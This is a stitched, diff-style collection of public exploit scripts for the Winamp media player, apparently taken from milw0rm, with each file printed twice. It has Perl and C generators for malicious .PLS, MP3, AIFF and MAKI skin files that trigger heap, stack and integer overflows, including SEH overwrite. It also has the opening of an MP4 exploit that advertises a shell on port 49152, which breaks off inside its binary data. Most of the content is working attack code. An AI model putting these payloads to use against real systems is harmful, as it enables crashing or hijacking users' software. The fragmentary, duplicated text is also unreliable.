print wmv "\x4D\x54\x68\x64";
close(wmv);
# Tested :
# --- WINAMP 5.3 Version ---
# Author :
# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org
# milw0rm.com [2007-04-19]


@ -1,56 +1,56 @@
#!/usr/bin/perl
# WinAmp GEN_MSN Plugin Heap Buffer Overflow
# ------------------------------------
# Discovered by SkD (skdrat@hotmail.com) &
# (skd@abysssec.com)
# ------------------------------------
#
# I'm not much for posting PoCs because
# I like writing exploits for whatever
# I discover and if I don't, its a waste.
#
# Anyway, this buffer overflow is located
# in the gen_msn plugin, which
# is basically a plugin that shows what
# song you're currently listening to
# on your PM in MSN. The plugin has over
# 800,000 downloads so its serious..
# (http://www.winamp.com/plugins/details/144799)
# This is similar to my other recent exploit
# for VUPlayer because it uses the same point
# of the .PLS playlist file!
#
# Debug Info:
# MOV EDI,DWORD PTR DS:[ECX+EAX*4+960]
# Regs:
# EAX 00000003
# ECX 41414141 <- Clear control over the register
# EDX 007EA478
# EBX 40000001
# ESP 028F1DB0
# EBP 77230459 USER32.SendMessageA
# ESI 08FD62A8 gen_msn.08FD62A8
# EDI 00497300 UNICODE "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# EIP 08FD293C gen_msn.08FD293C
#
# Peace out.
# _________ ___ ________
# / _____/| | __\______ \
# \_____ \ | |/ / | | \
# / \| < | ` \
# /_______ /|__|_ \/_______ /
# \/ \/ \/
use strict;
use warnings;
my $overflow = "\x41" x 2048;
open(my $pls_playlist, "> poc.pls");
print $pls_playlist "[playlist]\r\n".
"NumberOfEntries=1\r\n".
"File1=http://".
$overflow.
"\r\n";
close $pls_playlist;
# milw0rm.com [2009-01-07]
#!/usr/bin/perl
# WinAmp GEN_MSN Plugin Heap Buffer Overflow
# ------------------------------------
# Discovered by SkD (skdrat@hotmail.com) &
# (skd@abysssec.com)
# ------------------------------------
#
# I'm not much for posting PoCs because
# I like writing exploits for whatever
# I discover and if I don't, its a waste.
#
# Anyway, this buffer overflow is located
# in the gen_msn plugin, which
# is basically a plugin that shows what
# song you're currently listening to
# on your PM in MSN. The plugin has over
# 800,000 downloads so its serious..
# (http://www.winamp.com/plugins/details/144799)
# This is similar to my other recent exploit
# for VUPlayer because it uses the same point
# of the .PLS playlist file!
#
# Debug Info:
# MOV EDI,DWORD PTR DS:[ECX+EAX*4+960]
# Regs:
# EAX 00000003
# ECX 41414141 <- Clear control over the register
# EDX 007EA478
# EBX 40000001
# ESP 028F1DB0
# EBP 77230459 USER32.SendMessageA
# ESI 08FD62A8 gen_msn.08FD62A8
# EDI 00497300 UNICODE "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# EIP 08FD293C gen_msn.08FD293C
#
# Peace out.
# _________ ___ ________
# / _____/| | __\______ \
# \_____ \ | |/ / | | \
# / \| < | ` \
# /_______ /|__|_ \/_______ /
# \/ \/ \/
use strict;
use warnings;
my $overflow = "\x41" x 2048;
open(my $pls_playlist, "> poc.pls");
print $pls_playlist "[playlist]\r\n".
"NumberOfEntries=1\r\n".
"File1=http://".
$overflow.
"\r\n";
close $pls_playlist;
# milw0rm.com [2009-01-07]


@ -1,35 +1,35 @@
################################################################################################################################
#Winamp <= 5.541 multiples Denial of Services (MP3/AIFF)
#
# Winamp MP3 file parsing DoS ==>
#!/usr/bin/perl
use strict;
my $mp3 =
"\x49\x44\x33\x00\x00\x00\x00\x00\x09\x07\x54\x49\x54\x32\x00\x00\x00\x08\x00\x00\x00".
"\x50\x69\x73\x74\x65\x20\x35\x54\x50\x45\x31\x00\x00\x00\x05\x00\x00\x00\x41\x6e".
"\x69\x73\x54\x41\x4c\x42\x00\x00\x00\x0d\x00\x00\x00\x62\x6c\x61\x62\x6c\x61\x20".
"\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
my $mp32 =
"\x20" x 1500;
open(out, "> test.mp3");
binmode(out);
print (out $mp3, $mp32);
close(out);
#### Winamp AIFF file parsing header heap overflow :
#!/usr/bin/perl
use strict;
my $aiff =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4".
"\x00";
open(out, "> test.aiff");
binmode(out);
print (out $aiff);
close(out);
# milw0rm.com [2009-01-12]
################################################################################################################################
#Winamp <= 5.541 multiples Denial of Services (MP3/AIFF)
#
# Winamp MP3 file parsing DoS ==>
#!/usr/bin/perl
use strict;
my $mp3 =
"\x49\x44\x33\x00\x00\x00\x00\x00\x09\x07\x54\x49\x54\x32\x00\x00\x00\x08\x00\x00\x00".
"\x50\x69\x73\x74\x65\x20\x35\x54\x50\x45\x31\x00\x00\x00\x05\x00\x00\x00\x41\x6e".
"\x69\x73\x54\x41\x4c\x42\x00\x00\x00\x0d\x00\x00\x00\x62\x6c\x61\x62\x6c\x61\x20".
"\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
my $mp32 =
"\x20" x 1500;
open(out, "> test.mp3");
binmode(out);
print (out $mp3, $mp32);
close(out);
#### Winamp AIFF file parsing header heap overflow :
#!/usr/bin/perl
use strict;
my $aiff =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4".
"\x00";
open(out, "> test.aiff");
binmode(out);
print (out $aiff);
close(out);
# milw0rm.com [2009-01-12]


@ -1,187 +1,187 @@
/*
Winamp 5.551 MAKI Parsing Integer Overflow Vulnerability
This is just a simple poc code to show how to
exploit the recent MAKI file parsing vulnerability.
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Teasted:Winamp 5.551
Not vulnerable :Winamp 5.552
Im not going into any real detail as this is just
a poc code and i think the guy who wrote the article
explains where and why the integer overflow happens.
Im sure if you are that interested have a look through
the dll your self and you will also see the vulnerable memove :).
Credits to the guys down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
We are able to overwrite the exception handlers and gain full
control of the application the vendors released a patch for this
but older versions are still vulnerable.!!!!
Below is and explanation of the overflow which i took
from the web site from the url above.
[--Snip--]
.text:12094DAB var_10144= byte ptr -10144h
.text:12094DAB MultiByteStr= byte ptr -13ch
If a string size is greater than or equal to 0x8000, edi will be 0xFFFFhhhh
(where, 0xhhhh is the two byte input)
.text:12094F62 loc_12094F62:
.text:12094F62 mov ax, [ebx]
.text:12094F65 movsx edi, ax ; sign extension
.text:12094F68 inc ebx
.text:12094F69 push edi ; Size
.text:12094F6A inc ebx
.text:12094F6B lea eax, [ebp+MultiByteStr]
.text:12094F71 push ebx ; Src
.text:12094F72 push eax ; Dst, buffer is located in the stack
.text:12094F73 call memmove
.text:120951E5 loc_120951E5:
.text:120951E5 mov edi, [ebx]
.text:120951E7 add ebx, 4
.text:120951EA mov ax, [ebx]
.text:120951ED movsx esi, ax ; sign extension
.text:120951F0 inc ebx
.text:120951F1 push esi ; Size
.text:120951F2 inc ebx
.text:120951F3 lea eax, [ebp+var_10144]
.text:120951F9 push ebx ; Src
.text:120951FA push eax ; Dst, buffer is located in the stack
.text:120951FB call memmove
[--Snip--]
And once the file is created then we need to place the
mcvcore.maki file inside ..//Winamp/Skins/Bento/Scripts/.
And then open winamp with olldbg.And step through the
execution.
Credits to n00b for writing simple poc code !!
Progression is always a good thing.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
*/
#include <stdio.h>
#define MAKI "mcvcore.maki"
unsigned char First_Header[] =
{
0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
0x6C, 0x73, 0x37, 0x00
};
/*Trigger the overflow*/
unsigned char Exception [] =
{
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF
};
unsigned char Junk1 ='A';
int main()
{
FILE *fp;
int i;
if ((fp = fopen(MAKI, "wb")) == NULL)
{
printf("File %s write error\n", MAKI);
return(0);
}
for (i=0; i<sizeof(First_Header); i++)
fputc(First_Header[i], fp);
for (i=0; i<sizeof(Exception); i++)
fputc(Exception[i], fp);
for (i=0;i<16751;i++)
{
fwrite(&Junk1,1,1,fp);
}
fputs("\xEB\x06\x90\x90", fp);/*Pointer to next seh record */
fputs("\x42\x42\x42\x42", fp);/*SE handler*/
fclose(fp);
return 0;
}
// milw0rm.com [2009-05-22]
/*
Winamp 5.551 MAKI Parsing Integer Overflow Vulnerability
This is just a simple poc code to show how to
exploit the recent MAKI file parsing vulnerability.
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Teasted:Winamp 5.551
Not vulnerable :Winamp 5.552
Im not going into any real detail as this is just
a poc code and i think the guy who wrote the article
explains where and why the integer overflow happens.
Im sure if you are that interested have a look through
the dll your self and you will also see the vulnerable memove :).
Credits to the guys down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
We are able to overwrite the exception handlers and gain full
control of the application the vendors released a patch for this
but older versions are still vulnerable.!!!!
Below is and explanation of the overflow which i took
from the web site from the url above.
[--Snip--]
.text:12094DAB var_10144= byte ptr -10144h
.text:12094DAB MultiByteStr= byte ptr -13ch
If a string size is greater than or equal to 0x8000, edi will be 0xFFFFhhhh
(where, 0xhhhh is the two byte input)
.text:12094F62 loc_12094F62:
.text:12094F62 mov ax, [ebx]
.text:12094F65 movsx edi, ax ; sign extension
.text:12094F68 inc ebx
.text:12094F69 push edi ; Size
.text:12094F6A inc ebx
.text:12094F6B lea eax, [ebp+MultiByteStr]
.text:12094F71 push ebx ; Src
.text:12094F72 push eax ; Dst, buffer is located in the stack
.text:12094F73 call memmove
.text:120951E5 loc_120951E5:
.text:120951E5 mov edi, [ebx]
.text:120951E7 add ebx, 4
.text:120951EA mov ax, [ebx]
.text:120951ED movsx esi, ax ; sign extension
.text:120951F0 inc ebx
.text:120951F1 push esi ; Size
.text:120951F2 inc ebx
.text:120951F3 lea eax, [ebp+var_10144]
.text:120951F9 push ebx ; Src
.text:120951FA push eax ; Dst, buffer is located in the stack
.text:120951FB call memmove
[--Snip--]
And once the file is created then we need to place the
mcvcore.maki file inside ..//Winamp/Skins/Bento/Scripts/.
And then open winamp with olldbg.And step through the
execution.
Credits to n00b for writing simple poc code !!
Progression is always a good thing.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
*/
#include <stdio.h>
#define MAKI "mcvcore.maki"
unsigned char First_Header[] =
{
0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
0x6C, 0x73, 0x37, 0x00
};
/*Trigger the overflow*/
unsigned char Exception [] =
{
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF
};
unsigned char Junk1 ='A';
int main()
{
FILE *fp;
int i;
if ((fp = fopen(MAKI, "wb")) == NULL)
{
printf("File %s write error\n", MAKI);
return(0);
}
for (i=0; i<sizeof(First_Header); i++)
fputc(First_Header[i], fp);
for (i=0; i<sizeof(Exception); i++)
fputc(Exception[i], fp);
for (i=0;i<16751;i++)
{
fwrite(&Junk1,1,1,fp);
}
fputs("\xEB\x06\x90\x90", fp);/*Pointer to next seh record */
fputs("\x42\x42\x42\x42", fp);/*SE handler*/
fclose(fp);
return 0;
}
// milw0rm.com [2009-05-22]

View file

@ -1,127 +1,127 @@
#!/bin/perl
#
# Nullsoft Winamp MP4 tags Stack Overflow
#
# 0-day discovered and exploited by SYS 49152
#
# Tested on win XP SP2 ENG
# Tuned for Nullsoft Winamp 5.32 d.i.
# Shell on port 49152
#
# usage:
# well, not much fun for you kids here ..
# to get the shell you have to use ALT+3 and press UPDATE.
# Instead this one is VERY interesting for the exploiters around..
# this is an unicode sploit where in addition about half
# of the 0x0-0xff range can't be used..
# I'm quite curious to see if someone understands how I did..
# if this is the case drop me a mail with the magic word
# to gforce(put the @ here)operamail(put the . here)com
#
# btw
# due to some complaints by some kids that were having serious
# problems in using winzip, this time I tried with winrar :-)
#
#
#update:
#the latest 5.5 seems patched.
#the winamp version 5.32 reflects the date when I last updated
#this code, 'cause I exploited this one more than an year ago.
#I see that marsu exploited the same bug about six months ago,
#when I did the big mistake to show this one to some "friends"..
#I'm sure that marsu can even give the details on how this bug works :-)
# begin binary data:
my $rar_data = # code 724983
"\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00".
"\x00\x00\x00\x00\x00\xBF\x95\x74\x20\x80\x3C\x00\x5A\x04\x00".
"\x00\x70\x09\x00\x00\x02\x0B\x7C\xFB\x08\xB3\xB0\x24\x36\x1D".
"\x33\x1C\x00\x20\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31\x35".
"\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x77\x69\x6E\x61\x6D".
"\x70\x2E\x6D\x70\x34\x0C\x1D\x51\x10\x8D\x0F\xCD\x81\x1C\x8A".
